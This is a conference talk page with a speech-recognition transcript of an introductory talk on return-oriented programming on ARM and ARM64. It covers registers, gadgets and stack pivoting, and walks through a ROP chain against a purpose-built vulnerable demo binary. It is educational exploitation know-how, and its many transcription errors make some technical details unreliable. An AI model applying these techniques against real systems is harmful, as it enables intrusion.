← All talks

Introduction to Return Oriented Exploitation on ARM64

BSides Manchester · 201828:583.1K viewsPublished 2018-08Watch on YouTube ↗
Speakers
Tags
About this talk
A technical deep-dive into return-oriented programming (ROP) exploitation techniques on ARM and ARM64 architectures. The talk covers fundamental register layouts and calling conventions for both 32-bit and 64-bit ARM, introduces stack pivoting as a technique to execute gadget chains under memory corruption constraints, and demonstrates a complete ROP exploit against a vulnerable ARM64 binary.
Show transcript [en]

all right so today we're talking about an introduction to return oriented exploitation on 64 and I did actually really present this talk earlier today but the audio didn't record unfortunately so I'm doing a second time so first of all for those you don't know who I am my name is Billy Ellis a seventeen year old from the UK and I've been doing programming and iOS app development for around five or six years now and recently in the last two years I got interested in security specifically mobile security and so for exploitation and during that time I've created a various a set of various armed exploit exercise binaries which are they're basically like small programs where you

can test your skills at different types of memory corruption exploitation and those are available online I'm also the author of beginner's guide to exploitation arm which is what the title says it's a beginner's got a beginner's guide to the basic concepts of software exploitation specifically geared towards the ARM architecture so mobile devices and I also run a YouTube channel teaching different programming related topics app development expert development things like that mostly related towards iOS jailbreaking so the focus of this talk is to introduce return oriented exploitation techniques for people who are not familiar with it also to cover the fundamentals of both the arm and the arm be early on sixty-four architectures and then I'm

going to demo a rope exploit at the end to kind of integrate some of the techniques I'm going to discuss into an example that you can see so first of all why would you want to target arm so arm devices are us the mobile devices these are all running on ARM based chips some laptops now even use arm as well and embedded systems smartwatches lots of different devices are running on on-base chips so obviously it's making a huge worthwhile target for attackers and malware developers because they become more and more popular and so there's a big market for that so we're going to look at the fundamentals first of all of the arm v7 architecture so this is the

32-bit arm architecture it uses instructions of a fixed size of 32 bits and also it supports a different mode known as the thumb mode which is a 16-bit mode so that's useful at memory efficiency it also has 16 main registers that you need to know about as a semblance are labeled from R 0 to R 15 so R 0 to R 12 these are all general purpose registers and you can essentially use these to store any any date you need for your figure programs the first few of those so I think R 0 up until of three may be those used for passing arguments to functions so you would pass your first argument in R 0 second in R 1 and so on

then you also have some special purpose registers so our 13 first of all this is used as a stack pointer register which will always hold the address the points to the top of the current stack frame our 14 is the link register which will hold an address aware code execution needs to resume after a function is returned to its caller and finally our 15 is the program counter which will store the address of the next instruction to be executed so on the other hand we have RB 8 this is the 64 bit version so it's also referred to ism arm 64 and this the arm VI chips do actually support a aux 32 for backwards

compatibility and there's also some additional features in arm 64 processors including the support for exception levels which is a way of physically separating the execution levels of code so you can compare this to something like ring 0 and ring 1 that sort of thing but that's beyond the scope of this talk where the registers an RB 8 we have a different set of registers this time we have a lot more general-purpose ones we have 30 so and these are labeled from X 0 to X 29 and you also can actually refer to these in a 32-bit context if you use a w-2 reference Empire so the W actually obviously will be in the same register but it will

refer to as a 32-bit register register instead so it will essentially ignore the upper 32 bits and again we have the same free special purpose registers the link register X 13 is done stack pointer X 31 and then the program counter this time is its own register that's not actually directly modifiable by the programmer so if you're writing some armors - oh I'm 64 assembly code you cannot actually move a value directly into the program Conner you have you can only use the branch instructions whereas on rb7 you can actually use r15 as a registered to manipulate just like you would with any others so here's a couple of illustrations to demonstrate the differences between these two

instruction sets so you can see there's an differences in the register names both these small functions doing the same thing introduction mnemonics are going to vary very slightly and then return instructions with arm b7 we have a branch - the link register instruction on b8 you actually have a ret which is actually does the same thing some differences with these stuck access instructions so we're on b7 we have a push which is the kind of classic stack access instruction you know about which will add items to the top of the stack so in this case specified by the registers on b8 is slightly different you first of all actually manually shrink off so it grow the stack by

subtracting a value from the stack pointer so this gives stuck some new space at the top and then you use an STP instruction this will store a pair of registers so in this case X 29 and X 30 at the address relative to its stack pointer so it's done in two stages instead of one and then that same thing goes for the opposite so removing items from the stack and this also ties in with return from functions so again with bomb b7 we just have a pop instruction which pops values from the stack into the registers and in as I said you can directly access the program counter in our b7 so this would actually be

sufficient enough to return from a function you would have your return address on the stack and you'd pop it directly off into the program counter to return back to where you were before with our b8 this time we have three instructions so we as an LD P to load a pair of registers from the stack so in this case we X 29 X 30 again then we manually shrink the stack by adding a value to the stack pointer so it shrinks it back to its original stars and then we return with the rect which actually branches to X 30 which we would have just loaded with the LDP so that's the basics of the ARM

architecture the other way now when I talk about the basics of rock or return oriented programming so Rob stands for return oriented programming and it's a modern exploit technique used to execute a payload and it works on the basis of a code reuse attack so this was originally designed as an alternative to shellcode payloads which is the old-fashioned way of writing a payload that you may know this basically involved right in the actual byte encoding for several introductions to somewhere in the memory that you control so for example on the stack or on the heap an attacker could write their own instructions and then they would just jump to this place in memory using their code execution bug

and then they would be able to execute every stroke whatever introductions they wanted to obviously in modern systems it's actually not possible anymore but here's the diagram to kind of illustrate how that would work so you can see we have a stack here and assuming this is vulnerable to a classic kind of stack buffer overflow vulnerability you can see we write lots of shellcode in the green there which is the actual instructions of byte representation and we write that down until we get to the point of the save return address and then we just overwrite the save return address with an address pointing back to the start of the shellcode buffer and then when the function that you're

currently in returns it's going to jump to your shellcode and execute all the instructions you've prepared so you can essentially execute arbitrary code on your and your target process but as I said it's not long it's no longer possible because we have basic forms of data execution prevention which essentially means that the stack and heap memory you cannot execute anything from there because it's considered data so you can only execute code that's in the actual text segment of the binary where the GRU instructions will be so Rach obviously provides the workaround to that because it uses real instructions that are actually in the code segment but it just uses them in a different order essentially so it's kind

of like piecing together parts of the code in your own order so you just take pieces from different functions connect them together in order that achieves an outcome you want and that's how you can stock the payload with Rob so you actually use gadgets which are these are short sequences of instructions that end with a return instruction and this return instruction is the vital part that allows you to actually chained together several pieces of code to then execute a full chain before train payload now these gadgets are obviously found within the tech segment or the actual binary the executable segment and they're normally found at the end of a function because obviously they end in the return and that's where

you that's where you'd normally find them so this is an example of one gadget you might find four on the arm 64 architecture you can see it consists of three instructions the first one is an STR instruction and this in this case it stores the value of a register to memory location so in this case it stores whatever data is currently hold inside of x0 and it store that where wherever x1 points to so for example an attacker if they can already control x0 and x1 beforehand they have using this gadget an arbitrary right primitive because they can patch any error of the process memory by setting up these values beforehand and then jump into this

gadget so that's what might use this the next two instructions in the gadget are not actually really part of the gadget they're just the return instruction so on tom be an RBA you have the two two instructions to return so again loading the parent registers and then branch into x30 so but this the STR instruction is the only real desired instructions in this gadget so gadget services chained as I mentioned with the return instructions and this works essentially by placing all the gadget addresses that you want to execute in a chronological order on the stack going downwards and then every return instruction is going to get the next address from the top of the stack

because that's how returning normally works with function so it was extremely address to return to will be on the stack and therefore it's going to essentially go through your whole payload jump into these different locations in code so this diagram kind of represents that so again if we have a stack with a buffer overflow vulnerability this time we fill it up with some junk not the shellcode so in the green is just some junk data then we get to the point of the safe return address and then this time we overwrite that with the address point into somewhere in the code segment so you can see how very points fall it the gray arrow it points

to some gadget it doesn't matter what it is but it points to some gadget then all of the other gadgets that we want to execute after that we just place them continuously going down the stack in the Chrome and what happens is when the function returns it's going to jump to your first gadget which obviously can execute because it's in the real code segment that gadgets going to return which is going to follow the blue line back down go to your next gadget and so on this will keep going on depending on how many goats you've set up and that's how you execute a full payload and yet so the rep's is what allows them to you jump to

the next gadget so to actually find gadgets you obviously have to work with what you've got in the binary so you need to be able to use have an efficient way to go to actually scan the binary so there's a lot of tools out there that will allow you to search the binary for gadgets so essentially it works by scanning the whole binary for return instructions first of all and then when you find a return instruction you just search backwards in for byte chunks to look at the instructions that come before it and then obviously if you find an instruction before it that is useful to you in your specific case then you can note down the address of that gadget

and use that in your payload and there's obviously a lot of tools that online available that will do this for you so there's a there's a couple examples there which you want to check out so when executing a complex Rob chain or a rope chain involving a lot of gadgets there's often a problem that you may run into because this obviously very common occurrence if you're working with a real world exploit so for example if your tug in a kernel vulnerability for example in the iOS kernel and the Android kernel often the goal would be to use that kind of owner ability to obtain code execution and then actually patch out security measures that allow you to use

a device in a different way now this is not going to be done with a single gadget you're also going to need a lot of preparation a lot of different patches being applied and in some cases you may need several hundreds of gadgets to actually achieve the outcome now there is a problem with that which it will arise if you're working with modern bugs particularly ones based around the heap so the majority of bugs found in modern systems today at least at what I've studied and what I've seen are heap related bug so for example heap overflows or more complicated one such as used after freeze or double freeze these are the ones that most people are

most commonly found in modern systems today and obviously a lot of these that every every vulnerability is different so in a certain way it can occur you may be limited to the amount of gadgets you can actually you can actually execute and this is because if you don't actually have access to the stack like I just showed with the demo before if you're not working with a stack well over flip run ability then you have no Falken you have no controller with a dater on the stack so if you have your heap overflow then you trigger your bug jump your first gadget when that gadget tries to return it's going to be returning to the stack because that's

how that's done and therefore you're not going to have any dater on the stack that you control so you can only execute one gadget before the program is terminates so the solution to this is using a technique known as stack pivoting which is a technique that allows you to basically create your own fake stack with data that you fully control and you do this by basically modifying the stack pointer register and making it point to a new location in memory and in this memory it's populated with your octane or your gadget addresses and then you redirect code execution to your first gadget and then when it returns instead of going to the real stack it's going to be using your

fake stack which is obviously called at you control so it's going to go through your gadget chain just as normal as if you did have full control over the real stack so I'm going to explain kind of how this works exactly but first of all for those of you who are a bit more about the stack itself in most computer science classes you'd be told that the stack is a last in first out data structure and you essentially treat it as a physical stack of items so you can add an item to the top by pushing it and then you can remove an item from the top by popping it so this is essentially like a stack of place you can always you

can add one to the top and remove one from the top obviously this is just a theoretical model of it and the actual way this works is a lot different in in low-level memory in terms of how the binary would execute the stack is just an area of memory and the only thing that makes it the stack is the fact that a stack pointer points to it so for example this is just a block of memory here and you can see I've got the stack pointer up there set to address 1 0 and that red arrow represents that so this is currently considered as the top of the stack and it's only considered that because of the pointer of the stack

pointer value so you can see the date on the stack it's 4 1 4 1 4 1 is the top item so if you wanted to remove this item from the stack you would execute a pop instruction and the weight is actually X in the low level is all that's happening as you're stuck pointer value is being incremented by four for every value you want to pop so you incremented by four the stack pointer now points to somewhere higher in memory but lower down the stack because the stack grows in the opposite way to me to what you may think it grows towards the lower addresses and therefore now you're stuck is one item shorter no data is actually

changed in terms of the memory but your pointer is pointing one higher in memory so this is considered the new top of the stack and you can see the data actually remains in the memory because it doesn't doesn't really matter if it's there or not it's no longer considered part of the stack and same thing goes for pushing so in this case it's the opposite so you would decrement the stack pointer to grow it so up to here and then you write your new data to this new location here and then your new item has been added to the top of the stack so with this knowledge you can now see how I stack pivot would work so let's

assume this is the whole process memory for a target program and down here this section here is reserved for the stack so you have the stack base and then everything in between is the stack and in the stack pointer which is the top of the stack now if you have some other block of memory somewhere else which you controls if you work with a heap heap relate bug let's say we have a heap memory here with our fake rock stuck in so we fully controlled this memory we let we lay this out about gadget addresses and all we need to do to actually achieve the stack pivot is to somehow move the stack pointer so it

points to the start of this heap memory so when it points here the program's not going to know any different it just treats the stack as whatever this pointer points to and therefore this whole block is essentially going to be treated as a stack so what that means is when you then go to execute your gadgets and they return they're going to be returning from gadget addresses that have been placed in your controlled memory as opposed to what the real stack was and that's how you get your fake stack working so how do you how would you actually do this in practice well you would use a special type of rock gadget known as a pivot gadget which its

sole purpose is to control the stack pointer body with something that you can you can have some control over so here's an example of one again a simple gadget consistent for instructions the first instruction this time is a move instruction which will move x5 the value of x-5 into the stack pointer so assuming that the attacker already has their controlled address held in x5 this gadget would be perfect because they can then move that to the stack pointer and now the stack pointer points to their control memory and again the last two instructions are not actually really part the gadget Ledger's for the returning part so using those couple of techniques I've discovered I'm going to

show you an example attack on a kind of demo program I built for this talk so the demo program the target name is besides demo this is a small simple artificial binary for the purpose of testing this out now there's an arm v7 v8 version both of them I'm going to upload somewhere after this talk if you want to actually try this out yourself and the description there you can see it says the small binary vulnerable to a heap buffer overflow so obviously we're working with the heat begin so we are going to need a stack pivot and it allows a function pointer to be overwritten so we're gonna take a look at this binary well first of all the aim

for the exploit we're gonna we're gonna attempt to call the secret function now the secret function is a function inside this binary that is never called in the actual normal execution flow so it's kind of a hidden unused function and we're going to call that function and pass a code to the as the first parameter to this function and we're gonna get some kind of success message saying that we still successfully exploit the binary so here's a screenshot of what the binary looks like when you execute it so you can see though it gives you a b-sides banner at the top and then it asks you to enter the path to a file containing some data

and you enter that wherever you want there so file dot txt it's gonna read in all the data from the file and then just print out dr. is valid and then that sort will quit so by now you probably already guessed the only place the heap overflow can occur is when it actually reads the data at the file which is right because this is a snippet taken from hopper disassembler some pseudo code on the actual vulnerable part so you can see this call to f read this is actually reading in 512 bytes from from whatever file the user specifies and it's storing it into a 64 byte Charlotte right so this is a blatant buffer

overflow there it not store that date you're in it so it's gonna overflow into adjacent memory and conveniently for us there is a function pointer directly next to this buffer so any extra day or other than the 64 bytes this is going to be directly written in over to this function pointer which again conveniently is actually called directly after it's caught every so it's a very artificial case because obviously a real-world one or ability would not be as simplistic as this but this will this just serves well for the demo purpose and that is the that's the offset from this structure which will actually be on the heap so 64 bytes as long will be after that buffer

and it will call that function pointer so the secret function this is the one I said is hidden it's not actually used in the real program but essentially is a function that will take in a code as the first parameter and it will compare that so the code in this case is for one for F and it's going to compare that code to your your first argument or w0 and if the or if the code is correct then it's going to jump you to this section here which will give you a kind of success message and so you've completely exploit challenge if the code is incorrect or if you don't actually put a code at all or

supply code it's going to jump you here which will just give you an error message so you may be thinking why would you not just jump directly to this place because that would obviously by policies check and you'd get the errantly you get the success message right away but that'd be too easy and for the demonstration purposes we're going to assume that we have to call secret from its entry point just so we actually do have to work with a real life a real Rock chain that consists of a few more gadgets because otherwise it would literally as simple as a replace in the function pointer address with that address of the secret part so the

exploit pan is going to be - obviously game code execution which we already know how to do that with the blatant overflow into the function pointer then we're going to use that to use the rock chain which is going to first of all set up X 0 or W 0 hope to make sure it holds the secret code and then you're going to just jump to the secret entry point which should then validate that code and give us the success message so what do we know already well we can obviously control the program counter or the execution flow by overriding that pointer and since we're working with the heap we can execute a single gadget

worth of execution so we're going to need a stack pivot so we can actually execute several mortgages after that and this criteria for the stack pivot again must be a single gadget because that's all we get to work with and it must allow us to point the stack stack pointer to this very start of the heat buffer because this is where the data from the file is going to go into so obviously we control this memory and that's what we want us our fake stack so this gadget is actually within the binary the one I just gave is an example as a staff pivot gadget so it moves again x5 into the stack pointer and conveniently for us

again I programmed this example app in such a way that x5 will happen to hold the address of our heap chunk anyway so again very artificial because it wouldn't be as easy as this defined stack pivot in a real situation but again it serves as well for this demonstration purpose so we've got the stack paper sort out now for loading X 1 or X 0 or W 0 so here are two gadgets we're going to use to do this now you could theoretically do this with one gadget but I wanted to kind of replicate the more real-world idea Rob because you often when working with Rob obviously you have to work with what you've got in

your target binary so you cannot create instructions so often it will be the case that you find a gadget that's sort of it does kind of what you need it to do but there may be side effects or it may be not straightforward so in this case we want to control X 0 but we have to do it in two stages because this first gadget this lets us control X 3 and X 4 by loading a pair of registers it loads them from the stack so if we can have control debtor on the stack which we already know we can do we can control both of these registers now the next gadget will then allow us to move X

4 which we just control into X 0 so we can't have to take two steps to do this and at that point we will have full control over X 0 so that's how we're going to load the X 0 moves it with the code and finally it's a cool secret with it you just need the address of the secret function which you can just find were disassembled in the binary so we've also got that done so I've actually built an exploit file before I came here this this file here successfully exploits the binary and does carries a little black rock though just explained and I'm going to briefly dissect what each part of this does

again just to make it clear how this payload works so this is just the hex dump of the file exploit payload and all of this data this is less than 512 bytes so all of this data is going to be written to the heap and the first 64 bytes of it so up until this point here this is going to fill up the 64 byte char array that we had on heap and that means that any data after that is going to be what goes into the what overwrites the function pointer so the first thing we have after that is this which is the address of the first gadget so essentially we have we fill out the buffer we overwrite the

function pointer with the address of our first gadget which is our pivot gadget you can see there and therefore when the function returns it's going to be doing the stack pivot straight away so this will move x5 into the stack pointer which once that's actually done that essentially means the stack points to the top of this file all the data are in this file will be on the heap so when the stack with it's done the stack pointer is gonna be pointing to the top of this so therefore this is our new stack and then obviously it returns by loading a pair of registers it loads X 29 and X 30 and then it branches to X 30

so on the top of the stack what we have is some junk data that's going to be loaded into X 29 because we don't actually care about that register then we have the address that will go into X 30 which we then jump to afterwards so this isn't going to be the address of the second gadget and this is the first stage in control and X 0 so you can see this one is the one that loads X 3 and X 4 again from addresses relative to the stack so we load some random data into X 3 because I don't care about that one and then we load the secret code into X 4 which is the for 1 for F and this is

all in little-endian that's why the bytes are in reverse order if you're wondering then we return from this gadget so again we load some junk into X 29 and then we load the next address we want to go to into X 30 and this points to the third gadget which will move x4 to X 0 and again returns again so we have junk in X 29 and finally the last thing we need to do is just jump to secret entry point which is what that address is there so that will jump straight into secret and if all has been self correctly then at that point we should already have the controlled code inside of X 0 and so secret should

validate that and give us the success message so here we can specify that exploit payload file and then when we run this and enter that into the program instead of it just reading out the data and saying that saw this time it takes full control execuse the rock chain and then we have this success many success message saying that we managed to successfully crack the binary and an executor you name - a command so that is the exploit complete so just a quick demonstration of the rock technique and the stack pivot technique if you want to learn more about arm specifically or any other memory corruption exploitation then there's a few useful links here the top

one is especially good for learning about just assembly programming on the arm architectures there's a few other ones that you can check out and that second from bottom one that's where you can download the exploit challenges that I've ran for arm-based devices so if you want to try out some of those yourself and yeah that's my twitter handle if you want to tweet me or follow any of my work and yeah that's basically it so if anyone has any questions I'm happy to answer if not then you can tweet me afterwards and or come up to my office yeah yeah so there are actually some some methods some mitigations against Rob I have not personally looked into

them very much so I can't really answer that question too much detail but even with those mitigations is actually another form of rock known as drop or jump oriented programming which uses a kind of a similar approach we've obviously reusing code but it uses a dispatcher gadget and instead of using functions or instead of using gadgets in the return instruction it uses gadgets that end with conditional branches to other registers so it's a lot harder to mitigate that but yeah there are litigations against rock I've not seen very effective uses of lemon in major systems so I'm not really sure not really sure too much about them but yeah thank you a many other questions

yeah